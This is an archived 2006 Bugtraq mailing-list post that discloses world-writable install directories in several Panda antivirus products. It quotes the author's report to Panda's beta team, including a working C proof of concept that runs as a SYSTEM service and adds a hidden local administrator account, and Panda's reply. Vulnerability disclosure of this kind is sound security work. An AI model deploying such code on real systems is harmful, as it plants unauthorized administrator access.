lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060913163424.8176.qmail@securityfocus.com>
Date: 13 Sep 2006 16:34:24 -0000
From: lolfischer@...il.com
To: bugtraq@...urityfocus.com
Subject: Re: SECURITY.NNOV: Panda Platinum Internet Security privilege
 escalation / bayesian filter control security vulnerabilities

Panda is realy great and realy fast. The Bug was also reported at 16.07.06 to the beta team.




-------------------- 16.07.06 --------------------

Hi there,

i think there are some badly set filesystem permissions in your software.

FileSecure 7.01.10
C:\Programme\Panda Software\AVNT everybody full access

Titanium 2006 (5.03.00)
C:\Programme\Panda Software\ everybody full access

AntiVirus 2007 (2.00.80)
C:\Programme\Panda Software\ everybody full access

Platinum Internet Security 2006 (10.02.00)
C:\Programme\Panda Software\ everybody full access


it is possible to place a binary in the directory and let it execute at startup
as an service with system privs.

example for AntiVirus 2007 (2.00.80):

build it an place it in "C:\Programme\Panda Software\Panda Antivirus 2007"
for english Windows Version Porgram Files or somethin like this.


// --- pavsrv50.c ---
#include <windows.h>
#include <stdio.h>

INT main( VOID )
{
CHAR szWinDir[ _MAX_PATH ];
CHAR szCmdLine[ _MAX_PATH ];

GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );

printf( "Creating user \"owner\" with password \"PandaOWner123\"...\n" );

wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123 /add", szWinDir );

system( szCmdLine );

printf( "Adding user \"owner\" to the local Administrators group...\n" );

wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators owner /add", szWinDir );

system( szCmdLine );

return 0;
}
// --- pavsrv50.c ---


sorry for my bad english :)

testit on german windows xp sp2 all hotfixes and german windows 2k sp4 all hotfixes


btw. check the " if you install services

--------------------------------------------------


BTW: FileSecure 8.00.20 has the same vulnarability

I think the best solution is to change the AV Produkt.


Panda answer:
----------------- 21.07.06 -----------------------
Dear beta-tester,

Thank you very much for joining our beta program and reporting your tests so far. 

We comment you that "Panda Antivirus + Firewall 2007" and "Panda Internet Security 2007" have a Shield to protect its processes and files.

All incidents and comments received will help us to build a better product.

Please, do not doubt to report us any other incident or query that you may have.

Best regards,

Beta Area
Quality Assurance Division
mailto:beta@...dasoftware.com

Panda Software
Protection against viruses, spyware, hackers, spam and other Internet threats
Buenos Aires, 12
48001 BILBAO - SPAIN 

--------------------------------------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ